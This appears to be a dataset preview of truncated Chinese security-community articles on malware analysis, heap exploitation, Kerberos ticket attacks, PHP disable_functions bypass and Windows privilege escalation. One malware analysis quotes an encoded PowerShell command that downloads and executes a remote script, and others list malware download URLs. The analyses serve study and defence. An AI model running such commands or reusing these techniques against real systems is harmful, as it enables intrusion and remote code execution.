text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# 3月24日安全热点 – 印度的国家身份证数据库遭受重创,信息严重泄露
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
另一起数据泄露行动袭击了印度的国家身份数据库Aadhaar
<http://www.zdnet.com/article/another-data-leak-hits-india-aadhaar-biometric-database/>
亚特兰大市被勒索软件攻击瘫痪,是SAMSAM吗?
> [City of Atlanta paralyzed by a ransomware attack, is it
> SAMSAM?](http://securityaffair... | 社区文章 |
# RSAC创新沙盒2019:云、身份、应用安全成为焦点
|
##### 译文声明
本文是翻译文章,文章原作者 csoonline,文章来源:csoonline.com
原文地址:<https://www.csoonline.com/article/3337468/rsa-conference/rsac-innovation-sandbox-cloud-identity-application-security-take-center-stage.html?upd=1550552456675>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
在下个月即将举行的RSA
Conference(RSAC)上,企业家、网络从业... | 社区文章 |
作者:Hcamael@知道创宇404实验室
准备一份house of系列的学习博文,在how2heap上包括下面这些:
* house of spirit
* house_of_force
* house_of_einherjar
* house_of_orange
* house_of_lore
#### house of spirit
house of spirit是fastbin的一种利用方法,利用demo可参考:
<https://github.com/shellphish/how2heap/blob/master/house_of_spirit.c>
我通过具体的CTF PWN题目来学习该利用方法,题目... | 社区文章 |
# 【技术分享】手把手教你如何专业地逆向GO二进制程序
##### 译文声明
本文是翻译文章,文章来源:rednaga.io
原文地址:<https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/>
译文仅供参考,具体内容表达以及含义原文为准。
翻译:[啦咔呢](http://bobao.360.cn/member/contribute?uid=79699134)
预估稿费:170RMB
投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao.360.cn/contribute/i... | 社区文章 |
# 禁用php的system函数以获取shell访问
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/>
译文仅供参考,具体内容表达以及含义原文为准。
您可以禁用PHP函数
如果你拥有一个运行着PHP的Web服务器,禁用一些PHP的危险功能可能是一个好主意,其中有些功能也许是你的网站所不需要的
。如果攻击者设法在你的服务器上运行恶意代码,那么限制一些函数提供功能可能会减少攻击所带来的危害。幸运的是,... | 社区文章 |
# 由垃圾邮件投递的白加黑远控木马分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
上一周,捕获到一个最新攻击的诱饵文件,通过分析后发现:
诱饵文件由垃圾邮件投递,文件名为“中转银行卡出入明细.exe”,该诱饵文件再字符串及功能上表面看上去是一个自写的浏览器,但实际作为病毒下载器来下载后续的远控组件。
通过对相关样本的分析,提取相关IOC,有利于对攻击手法的了解及检测
## 攻击流程
## 样本分析
### 下载器
诱饵“中转银行卡出入明细.exe”为exe文件,诱骗用户点击
看样本的字符串是伪装成自写的浏览器
主要的关键代码如下
样本运行后会请求下载`hxxp://60.16... | 社区文章 |
# Google Play上的Joker家族
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 事件概要
2020年7月3日推特上有移动安全人员披露一起拥有1w+下载量的Joker家族样本,其家族名源于其早期使用的C2域名,提取了其中的特征字符串Joker作为其家族名称,其主要的恶意行为是肆意给用户订阅各种收费SP服务、窃取用户隐私来进行收益,鉴于Joker是目前Google
Play商店上最活跃的家族之一,所以我对其家族成员样本进行详细分析,披露其近期“激进”的发展态势。
## 威胁细节
### Google Play传播
Google Play应用商店Pioneer SMS APP,2... | 社区文章 |
# 深耕保护模式(二)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 代码跨段执行
**本质就是修改CS段寄存器**
要点回顾
段寄存器:
ES,CS,SS,DS,FS,GS,LDTR,TR
段寄存器读写:
除CS外,其他的段寄存器都可以通过MOV,LES,LSS,LDS,LFS,LGS指令进行修改
### CS为什么不可以直接修改呢?
CS为代码段,CS的改变意味着EIP的改变,改变CS的同时必须修改EIP,所以我们无法使用上面的指令来进行修改。
### 代码间的跳转(段间跳转 非调用门之类的(不能提升CPL权限))
段间跳转,有两种情况,即要跳转的段是一致代码段还是... | 社区文章 |
# WebDAV本地提权漏洞(CVE-2016-0051)POC & EXP
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
译文仅供参考,具体内容表达以及含义原文为准。
**漏洞信息**
该漏洞存在于Microsoft Web 分布式创作和版本管理 (WebDAV)中,如果 Microsoft Web 分布式创作和版本管理 (WebDAV)
客户端验证输入不当,那么其中就会存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。
工作站和服务器最易受此攻击威胁。此安全更新程... | 社区文章 |
# Linux网络编程模型
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
因为最近在找开源网络组件的漏洞,将自己遇到的linux网络编程问题做个总结,也巩固一下自己的网络基础知识,我做的就是总结和归纳,很多知识都是直接使用参考链接中的代码和描述,感觉描述不清楚的,建议直接看参考链接中大佬的文章,描述不正确的,直接可以联系我,我做改正。
写这个文章看了很多大佬的文章,大佬的文章,基本有3个特点
1. 全部理论介绍,理论特别详细,但是没有具体实现代码,有的可能也只是伪码
2. 是基本全是代码,理论基本没有,但是代码又不全,看不到效果
3. 形象比喻,各种绘声绘影的描述网络... | 社区文章 |
**作者:Escapingbug
项目地址:[awesome-browser-exploit](https://github.com/Escapingbug/awesome-browser-exploit/blob/master/README.md "awesome-browser-exploit")**
Share some useful archives about browser exploitation.
I'm just starting to collect what I can found, and I'm only a starter in this
area as well. Contributions are... | 社区文章 |
# 从"新"开始学习恶意代码分析——静态分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
熟练的阅读汇编代码是恶意软件分析时的基本功。
在本节中,我将以一个比较简单的Downloader(下载者)程序为例,以纯汇编的角度来对该恶意样本进行分析。
本节中所使用到的样本已经上传到了app.any.run
可以访问这个地址进行下载:<https://app.any.run/tasks/ba68e2aa-2083-48ad-ac3f-34dcc9e4446b>
这个地址是该样本在app.any.run上面的沙箱页面,访问该页面,然后单击Get sample即可下载
下载的样本解... | 社区文章 |
### 安全性分析
系统采用的是单入口模式,即只能通过index.php访问/inc/module/下的模块文件
因为常量in_mx定义在了index.php中
而其他文件都包含了下面的一条语句,若没有定义常量直接退出
if (!defined('in_mx')) {exit('Access Denied');}
先分析下index.php是如何加载模块文件的
<?php
define('in_mx', TRUE);
$p=isset($_GET['p']) ? addslashes($_GET['p']) : '';
$p=(trim($p)=='') ? 'index' : trim($p... | 社区文章 |
**作者: 腾讯IT技术
原文链接:<https://mp.weixin.qq.com/s/VZWM3p-XPX7JP23s-R859A>**
## 导语
渗透的本质就是信息搜集,在后渗透阶段获取目标机器权限后,经常需要获取浏览器加密凭据和远程桌面RDP凭据等等,攻击队员一般利用 mimikatz
工具实现离线解密。为了更好的理解攻击原理,本文会介绍mimikatz如何进行解密以及代码是如何实现的。
## 1\. 从实际的后渗透场景开始
先介绍蓝军如何使用 mimikatz 对Chrome密码进行解密的,分为以下两种场景:
**场景1:在受害者主机上,以用户的安全上下文中解密Chrome凭据:**
**场景2:当将Chrome加... | 社区文章 |
# FakeTelegram木马分析报告
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 概述
今年3月份,360安全大脑反病毒团队发现了一起伪装成Telegram通讯软件安装包进行的攻击。“安装包”执行后,会下载合法的Telegram安装包进行安装,以掩盖暗中的恶意行为,通过RDP服务实现驻留。
攻击流程图如下:
## 攻击途径
木马的下载链接:
hxxps://iplogger.org/2r64b6
(数据显示该短链接的来源页面为hxxps://telegram.ccmmsl.com/)
浏览器访问下载链接,将被重定向到URL:
hxxps://cdn.discordapp.com/at... | 社区文章 |
作者:云鼎实验室
近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对攻击时有迹可循,并为其提供可靠的安全指南。上篇报告从
DDoS 攻击的角度揭示了云上攻击最新趋势,本篇由同一技术团队云鼎实验室分享:「SSH暴力破解趋势:从云平台向物联网设备迁移 」, 以下简称《报告》。
#### 一、基本概念
SSH 暴力破解是什么?
SSH
暴力破解是一种对远程登录设备(比如云服务器)的暴力攻击,该攻击会使用各种用户名、密码尝试登录设备,一旦成功登录,便可获得设备权限。本篇报告内容云鼎实验室从攻击现状、捕获样本、安全建议等方... | 社区文章 |
# 【技术分享】NSA武器库:DOUBLEPULSAR的内核DLL注入技术
|
##### 译文声明
本文是翻译文章,文章来源:countercept.com
原文地址:<https://www.countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**
**
****
翻译:[ **myswsun**](http://bobao.360.cn/member/contribute?uid=2775084127)
**稿费:200RMB**
投稿方式:发... | 社区文章 |
# Rex: 自动化利用引擎分析
## 前言
最近在看 rex,没有官方文档,已有的教程也有点过时,基本只能通过看源码学习。
本篇教程当作是学习的记录,也希望能帮助对 rex 感兴趣的同学对 rex 的架构和使用方式有个整体的认识。
## 概述
Rex 是 [Shellphish](http://shellphish.net/cgc/) 团队开发的自动生成 exploit 的引擎,是
[Mechaphish](https://github.com/mechaphish) 中的一个模块,最初用于
[CGC](https://ma3k4h3d.top/2018/11/01/CGC/) 竞赛。
Rex 基于硬件模拟器 QEMU 和 ang... | 社区文章 |
# Grub2认证绕过0DAY漏洞
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html>
译文仅供参考,具体内容表达以及含义原文为准。
**内容:**
**1.描述。**
**2.影响。**
**3.关于该漏洞。**
**4.利用(POC)。**
**5.APT如何利用这个0-day。**
**6.修复。**
**7.讨论。**
描述:
在Grub2上发现一枚0day漏洞。版本从1.98(十二月,2009)到2.02(十二月,2015)受到影响。该漏洞可以在某些情况下... | 社区文章 |
# CloudGoat云靶机 Part-1:AWS EC2提权详解
|
##### 译文声明
本文是翻译文章,文章原作者 rzepsky,文章来源:medium.com
原文地址:<https://medium.com/@rzepsky/playing-with-cloudgoat-part-1-hacking-aws-ec2-service-for-privilege-escalation-4c42cc83f9da>
译文仅供参考,具体内容表达以及含义原文为准。
本文是“Playing with CloudGoat”
系列文章的第一篇,这个系列文章将介绍基于AWS服务错误配置进行攻击的方法。今天我将主要介绍[CloudGoat](... | 社区文章 |
####
Author:[Tomato](https://bl4ck.in/vulnerability/analysis/2017/12/22/WebLogic-WLS-WebServices%E7%BB%84%E4%BB%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html)
最近由于数字货币的疯涨,大量机器被入侵后用来挖矿,其中存在不少部署了Weblogic服务的机器,因为Weblogic最近所爆出安全漏洞的exploit在地下广泛流传。回到这个漏洞本身,其原因在于WLS-WebServices这个组件中,因为它使用了XML... | 社区文章 |
仅记录学习笔记,参考网上各位前辈的文章讲解加上个人理解。如有错误,请及时提醒,以免误导他人。
`Windows`本地登陆密码储存在位于`%SystemRoot%\system32\config\`目录的`SAM`文件中,存储内容为密码的`hash`值。当用户输入密码时,`Windows`先将用户的输入通过算法加密再与`SAM`文件存储的数据对比,一致则认证成功。
`Windows`所使用的密码`hash`有两种,`LM Hash`与`NTLM hash`。
## 0x01 LM Hash
`LM` 全称`LAN Manager` ,`LM
hash`作为`Windows`使用较早的认证协议,现已基本淘汰,仅存在于较老的系统中,如`W... | 社区文章 |
# 【技术分享】如何利用机器学习检测加密恶意流量
##### 译文声明
本文是翻译文章,文章来源:continuum.cisco.com
原文地址:<https://continuum.cisco.com/2017/06/20/security-without-compromise-how-cisco-engineers-used-machine-learning-to-solve-an-impossible-problem/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[lfty89](http://bobao.360.cn/member/contribute?uid=2905438952)
预估稿费:200RMB
投... | 社区文章 |
# Real World CTF Of "The Return of One Line PHP Challenge"
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
被Real World CTF虐哭了,不过能够跟世界级的大佬同台竞技也感到满足了。
这次RW线下出了一道名为`The Return of One Line PHP Challenge`的web题,题目描述翻译如下
源码和环境跟HITCON2018中orange大佬出的[One Line PHP
Challenge](https://github.com/orangetw/My-CTF-Web-Challenges#one... | 社区文章 |
# pwn堆入门系列教程8
[pwn堆入门系列教程1](https://xz.aliyun.com/t/6087)
[pwn堆入门系列教程2](https://xz.aliyun.com/t/6169)
[pwn堆入门系列教程3](https://xz.aliyun.com/t/6252)
[pwn堆入门系列教程4](https://xz.aliyun.com/t/6322)
[pwn堆入门系列教程5](https://xz.aliyun.com/t/6377)
[pwn堆入门系列教程6](https://xz.aliyun.com/t/6406)
[pwn堆入门系列教程7](https://xz.aliyu... | 社区文章 |
> Author : Dlive
## 1\. 调试环境配置
本次调试分析的漏洞是长亭科技在某届GeekPwn上提交的路由器漏洞
该路由器的系统为嵌入式ARM Linux, 路由器中集成了Xware程序,本文中的漏洞为Xware的漏洞
我们可以找到存在漏洞的固件版本,固件的下载链接可以在官方论坛上找到
使用binwalk解包
# dlive @ pwn in /tmp [14:25:56]
$ binwalk -Me XXXV100R001C01B032SP03_main.bin
Scan Time: 2018-03-13 14:26:08
Target File: /tmp/XXXV10... | 社区文章 |
**作者:xxhzz@星阑科技PortalLab
原文链接:<https://mp.weixin.qq.com/s/UTMly3wLfK0SQHOj5CcN8w>**
# **前言**
实验室团队开发出一款自动化Web/API漏洞Fuzz的命令行扫描工具(
**工具地址:**<https://github.com/StarCrossPortal/scalpel>)。本周将重点持续更新漏洞POC库,已新增多个热门组件的漏洞检测规则。功能方面:在前三个版本已陆续修复相关BUG问题,目前对扫描器结果展示也进行了优化,预计在下个版本进行更新。后续也会对使用说明文章进行补充,方便大家使用。
# **YApi介绍**
YApi 是高效、易用... | 社区文章 |
**作者:0x7F@知道创宇404实验室
日期: 2023年5月5日 **
### 0x00 前言
Windows 从 vista 版本引入一种进程保护机制(Process Protection),用于更进一步的控制进程的访问级别,在此之前,用户只需要使用
`SeDebugPrivilege` 令牌权限即可获取任意进程的所有访问权限;随后 Windows8.1
在此进程保护的基础上,扩展引入了进程保护光机制(Protected Process Light),简称 `PPL`
机制,其能提供更加细粒度化的进程访问权限控制。
本文将介绍 Windows 的 PPL 安全机制,以及在实验环境下如何绕过该机制,从而实现对 PPL 的进程... | 社区文章 |
# 一些网站https证书出现问题的情况分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
20200326下午,有[消息说](https://v2ex.com/t/656367?p=2)[1]github的TLS证书出现了错误告警。证书的结构很奇怪,在其签发者信息中有一个奇怪的email地址:346608453@qq.com。明显是一个伪造的证书。
为了弄清楚其中的情况,我们对这一事件进行了分析。
## DNS劫持?
出现证书和域名不匹配的最常见的一种情况是DNS劫持,即所访问域名的IP地址和真实建立连接的IP并不相同。
以被劫持的域名go-acme.github.io为例,我们的passiv... | 社区文章 |
# 前言
昨天下载了一个模拟器,正在打算回味马里奥的时候,火绒突然弹了一个报警,提示有程序想要运行powershell脚本,我一看,好家伙,应该是后门,简单的分析一波。
## 分析
### 步骤一
首先把执行的代码复制出来
powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBpAGMAdQBkAG8AbQBhAGk... | 社区文章 |
**作者:李木**
**原文链接:<https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw>**
# PP/PPL(s)背景概念
首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows
Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并遵守DRM(数字版权管理)要求。Microsoft
开发了这种机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是镜像文件(即可执行文件)必须使用特殊的 Windows Media... | 社区文章 |
**作者:无明@天玄安全实验室**
**原文链接:<https://mp.weixin.qq.com/s/LONOffiPKM2kSh74EmI8xA>**
### 一 漏洞简介
前段时间,微软公布Windows
PrintNightmare两个安全漏洞,分别为[CVE-2021-1675](https://nvd.nist.gov/vuln/detail/CVE-2021-1675)和[CVE-2021-34527](https://nvd.nist.gov/vuln/detail/CVE-2021-34527)。公布几天后,minikatz率先工具化集成了CVE-2021-1675和CVE-2021-34527的EXP。通过... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://asec.ahnlab.com/en/33186/>**
ASEC 研究团队发现一个 Word
文件,它似乎是针对企业用户的。该文件包含一个图像,提示用户启动类似恶意文件一样的宏。为了欺骗用户认为这是一个无害的文件,当宏运行时,它显示了与提高谷歌帐户安全性有关的信息。最终,它会下载额外的恶意软件文件并泄露用户信息。
当文件运行时,它会显示一个“在公共机构中创建的HWP格式的文件”,提示用户运行文件中已存在的 VBA
宏。它的右边还有备忘录,让它看起来像是由微软创建的文件。文档属性上的作者也显示为 Microsoft。
图1. Word 文件
图2. 文档属性
当用... | 社区文章 |
# ToTok事件与样本简要分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
ToTok是阿联酋的一种手机通讯应用程序,已有数百万台手机下载并安装。
而阿联酋,是一个禁用诸如WhatsApp和Skype之类的聊天APP的国家,因此ToTok的出现引领了一股下载风潮。但据熟悉机密情报评估和对该应用程序及其开发者进行调查的美国官员说,ToTok实际上是一种间谍工具。阿拉伯联合酋长国政府使用它来尝试跟踪将其安装在手机上的人们的每一次对话,动向,关系,约会,声音和图像。
## 事件分析
仅仅几个月前推出的ToTok,中东,欧洲,亚洲,非洲和北美的用户已经从Apple和Google应用商店下载了数百万次... | 社区文章 |
## 0x01 前言
前段时间续师傅又给我指出了fastadmin 后台低权限拿 shell 的漏洞点:
在忙好自己的事情后,有了这次的分析
影响版本: **V1.0.0.20191212_beta** 及以下版本
## 0x02 fastadmin 的鉴权流程
低权限后台拿 shell 遇到的最大的问题就是有些功能存在 getshell 的点,但是低权限没有权限去访问。因此我们有以下几个思路:
* 在低权限的情况下,找到某些功能存在 getshell 的点
* 把低权限提升到高权限,再利用高权限可访问的功能点去 getshell
* 绕过权限的限制,找到 getshell 的点
本文利用的就是第一种和第二种相结合的情况... | 社区文章 |
# Kerberos协议探索系列之票据篇
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
在上一篇中说明了Kerberos的原理以及SPN的扫描和Kerberoasting的攻击方式,本章具体说一下Kerberos曾经爆出的一个经典的漏洞MS14068和金银票据的原理和利用方式。MS14068是一个比较经典的漏洞,曾经也有同学在平台上说明过,本文炒一次冷饭并且对增强型的金票据做一个说明。
## 0x01 MS14068
MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。首先我们来说一下利用方式。
### 1 利... | 社区文章 |
**作者:[wjllz](https://redogwu.github.io/2018/11/04/windows-kernel-exploit-part-5/ "wjllz")
来源:[先知安全技术社区](https://xz.aliyun.com/t/3429 "先知安全技术社区")**
## 前言
Hello, 欢迎来到`windows kernel explot`第五篇. 在这一部分我们会讲述从windows
7到windows的各主流版本的利用技巧(GDI 对象滥用). 一共有两篇, 这是上篇.
[+] 从windows 7到windows 10 1607(RS1)的利用
[+] windows 10 ... | 社区文章 |
# IOT安全——stm32从做题到复现
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
在最近的ctf比赛中,开始出现以stm32系列固件分析为代表的物联网安全类题目,由于这类问题涉及到嵌入式硬件、嵌入式系统等多方面的知识,未来出题、研究空间都非常广阔,这次就让我们借助题目一起来学习一下。由于考研失踪了很久,很多联系我的同学我也没能回复,希望大家原谅,之后一段时间我就正式回来啦。
## 啥是stm32?
STM32是一种功能强大的32位的单片机,它基于低功耗的ARM内核,由于它采取的Cortex的内核,性能比起传统的51单片机强了不知道多少倍,而且还提供了强大的外围设备,比如usb,这都是以... | 社区文章 |
# 前言
比赛的一个 `arm 64` 位的 `pwn` 题,通过这个题实践了 `arm 64` 下的 `rop` 以及调试环境搭建的方式。
题目文件
https://gitee.com/hac425/blog_data/tree/master/arm64
# 程序分析
首先看看程序开的保护措施,架构信息
hac425@ubuntu:~/workplace$ checksec pwn
[*] '/home/hac425/workplace/pwn'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack... | 社区文章 |
# 《Dive into Windbg系列》AudioSrv音频服务故障
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:BlackINT3
联系:[blackint3@gmail.com](mailto:blackint3@gmail.com)
网站:<https://github.com/BlackINT3>
> 《Dive into Windbg》是一系列关于如何理解和使用Windbg的文章,主要涵盖三个方面:
>
> * 1、Windbg实战运用,排查资源占用、死锁、崩溃、蓝屏等,以解决各种实际问题为导向。
> * 2、Windbg原理剖析,插件、脚本开发,剖析调试原理,... | 社区文章 |
# IOT安全——stm32终章
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
上一篇中我们解释了stm32的时钟与中断机制,这篇文章中我们将进一步探究dma、usart、tim的原理,并最终完整的复现题目。
对于诸如usb、看门狗等内容大家可以进行类比,为了节约篇幅,我就不再文章中一一进行学习了。希望大家在这篇文章后能够自己动手完整复现题目。
## 时常要用到的定时器
TIM,定时器,最主要的功能就是定时,这么一说你可能会觉得它用处不是很大,但实际上,TIM绝对是stm32最关键的部件之一,举个最简单的栗子,现在我们希望能够输出pwm脉冲进而控制某个外接的工业设备(对于工业设备来说,pwm... | 社区文章 |
前置:绕过≠破解,侵删。
# 0x01、起因
昨天在对公司一个项目的渗透测试过程中要爬取用户名进行爆破,该网站部署了加速乐反爬虫平台,像平时一样打开selenium,发现加速乐不知道什么时候又更新了。
先科普一下加速乐,加速乐是知道创宇推出的一款在线免费网站CDN加速、网站安全防护平台。致力于系统化解决网站访问速度过慢及网站 **反爬虫** 、反黑客问题。
部署了加速乐的网站,第一次访问时会返回一段加密的js,检查浏览器环境,符合预设才会进一步请求其他资源文件,不符合直接返回521状态码。登录账号后,服务器端返回cookie,包括获取目标数据的关键cookie键
**jsl_clearance,每二三十分钟后** jsl_clear... | 社区文章 |
作者:Leeqwind
作者博客:<https://xiaodaozhi.com/exploit/70.html>
前面的文章分析了 CVE-2016-0165 整数上溢漏洞,这篇文章继续分析另一个同样发生在 `GDI` 子系统的 CVE-2017-0101
(MS17-017) 整数向上溢出漏洞。分析的环境是 Windows 7 x86 SP1 基础环境的虚拟机,配置 1.5GB 的内存。
#### 0x0 前言
这篇文章分析了发生在 `GDI` 子系统的 CVE-2017-0101 (MS17-017) 整数向上溢出漏洞。在函数 `EngRealizeBrush`
中引擎模拟实现笔刷绘制时,系统根据笔刷图案位图的大小以及目标... | 社区文章 |
# “确认收货,加V免费送礼品”,这类特征短信高危!!!
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近期,各大电商平台大促之后,不少用户都会陆续收到商家发送的“确认收货”的短信,然而,360手机先赔收到用户反馈,因添加了陌生号码发来的短信中的微信,在领取所谓的“红包”过程中,被骗在博彩平台充值下注,被骗几千元。如何辨别这些藏有“暗语”的风险短信?短信里引导添加的“微信号/公众号”,真的可以领到所谓的“红包”或“免费送xx”吗?其中套路卫士妹给您说一说~
## 案例经过
n用户收到兼职短信内容显示“确认收货,可以送早餐机”,便添加了短信内的微信账号,骗子确认用户是通过短信添加后,邀请用户进微信... | 社区文章 |
**原文链接:<https://mp.weixin.qq.com/s/Wl0I0CIrLmMHSr9RjpFNHg>**
**作者:腾讯御见威胁情报中心**
## 一、背景
近期,国外安全公司ESET发布了恶意软件Ramsay针对物理隔离网络的攻击报告(见参考链接1)。所谓物理隔离网络,是指采用物理方法将内网与外网隔离,从而避免入侵或信息泄露的风险的技术手段。物理隔离网络主要用来解决网络安全问题,尤其是在那些需要绝对保证安全的保密网、专网和特种网络,几乎全部采用物理隔离网络。
基于腾讯安全威胁情报中心的长期研究跟踪,该
Ramsay恶意文件,跟我们之前跟踪的retro系列的感染文档插件重叠。该波攻击至少从18年就已经开始,并且一... | 社区文章 |
# CVE-2015-0057:从Windows内核UAF到内核桌面堆分配
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
本篇文章主要是对Windows内核漏洞CVE-2015-0057进行分析,漏洞的知识点特别多,也阅读了很多的资料,也很感谢给予我帮助的一些师傅,总之我会详细的记录自己对这个漏洞的理解和分析,我主要想分享一些我的学习方法,比如拿到一个Poc,该如何调试,如何判断自己每一步做对了,拿到IDA反编译的结果,该如何分析等等,先介绍一下这个漏洞的一些信息
漏洞编号 | 漏洞类型 | 利用平台
---|---|---
CVE-2015-0057 | Use Afte... | 社区文章 |
#### Author:[hflsafe](http://blog.hflsafe.cn/2017/11/22/office-vulnerability-cve-2017-11882/)
## 0x01 漏洞产生背景
2017年11月,微软在例行系统补丁发布中,修复了一个Office远程代码执行的严重漏洞,编号CVE-2017-11882。该漏洞类型为缓冲区溢出,位于EQNEDT32.EXE组件。受害用户打开恶意的office文档时,无需交互,就可能执行恶意代码。
据悉,这个组件是由Design Science
Inc.开发的,后来由微软收购。该组件于2001年编译嵌入office,之后没有任何进一步的修改。所以该漏洞已存在17年之... | 社区文章 |
# 【漏洞分析】Oracle旗下PeopleSoft产品被曝存在未授权远程代码执行漏洞
|
##### 译文声明
本文是翻译文章,文章来源:ambionics.io
原文地址:<https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[ **WisFree**](http://bobao.360.cn/member/contribute?uid=2606963099)
**稿费:150RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**Oracle PeopleSo... | 社区文章 |
## 1.前言
小白先知上的第一发,找了个水水的cms简单看了波,发现它的sql注入过滤字符匹配函数写的很奇葩。调用该方法进行过滤前端传入的参数,再拼接入sql进行数据库操作即会造成SQL注入。以下是简单审计过程,适合和我一样的小白看,大佬勿喷!有错误的话请及时指正。
## 2.正文
查看library.php,可以看到相应的对SQL注入参数过滤函数为str_safe(),对传入的参数html实体编码后再调用str_isafe()来判断字符中是否含有sql查询的特征并将其替换,如下所示:
//返回可安全执行的SQL,带html格式
function str_isafe($str) {
$tmp = arr... | 社区文章 |
## 一、前言
不知道大家是否还记得我去年的一篇文章《Web日志安全分析浅谈》,当时在文中提到了关于日志里的“安全分析”从人工分析到开始尝试自动化,从探索到实践,从思路到工程化,从开源组件到自研发,从..,其中夹杂着大量的汗水与踩过的大量的坑,文章中所提的思路以及成果也算不上有多少的技术含量,其目的一是为了总结、沉淀与分享,如果能帮助到任何为“日志分析”而迷茫不知从何着手的人便算获得了些许慰藉,其目的二是为了抛砖引玉,大家集思广益将不同的分析方法、前沿技术及优秀思路。后来在社区看到xman21同学进行实践并进行分享《Web日志安全分析系统实践》,作者试着使用了如SVM、Logistic回归、朴素贝叶斯等算法进行训练与识别,可以看出x... | 社区文章 |
> 本文为翻译文章,原文链接:<https://www.gosecure.net/blog/2019/07/30/fuzzing-closed-> source-pdf-viewers>
此文章介绍了 **fuzz闭源pdf查看器** 时出现的典型问题以及可能的解决方案。因此,它着重于两者: **输入最小化** 和 **程序并未终止**
这些方法是作为我的硕士论文的一部分找到并实施的,我在德国达姆施塔特工业大学与Fraunhofer SIT合作撰写了这篇论文。
# Context(问题背景)
模糊PDF查看器的核心思想非常简单:选择一个PDF文件,稍微破坏它并检查它是否会使查看器崩溃。
虽然这听起来非常简单,但要正确有效地完成它却非... | 社区文章 |
# 没有银弹-AI安全领域的安全与隐私
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
银弹(英语:silver
bullet)是一种由白银制成的子弹,有时也被称为银弹。在西方的宗教信仰和传说中作为一种武器,是唯一能和狼人、女巫及其他怪物对抗的利器。银色子弹也可用于比喻强而有力、一劳永逸地适应各种场合的解决方案。
计算机科班出身的同学在学习软件工程时,应该都看过或者听说过一本书:《人月神话》,这是软件工程领域的圣经,其中一篇收录的一篇论文名为《没有银弹:软件工程的本质性与附属性工作》,Brooks在其中引用了这个典故
,说明在软件开发过程里是没有万能的终杀性武器的,只有各种方法综合... | 社区文章 |
# 冰蝎,从入门到魔改(续)
##### 译文声明
本文是翻译文章,文章原作者 酒仙桥6号部队,文章来源:酒仙桥6号部队
原文地址:[https://mp.weixin.qq.com/s?src=11×tamp=1596525787&ver=2501&signature=y5ekoiN25KhnBjW3BcpHNZeGHOZA8q3UDSODpXPryocNFEZluH61b*2TYmZoRRnOKbJmI1gtRNyo-iLBAGJ90Ybb9O-e9bMUFDYqoTfXrodXuF6T5-nt*QDfIHCGkR*l&new=1](https://mp.weixin.qq.com/s?src=11×tamp... | 社区文章 |
**目录**
1. 背景
2. 认识java序列化与反序列化
3. 理解漏洞的产生
4. POC构造
5. 实际漏洞环境测试
6. 总结
* * *
**背景**
2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客,阐述了利用Java反序列化和Apache
Commons Collections这一基础类库实现远程命令执行的真实案例,各大Java Web
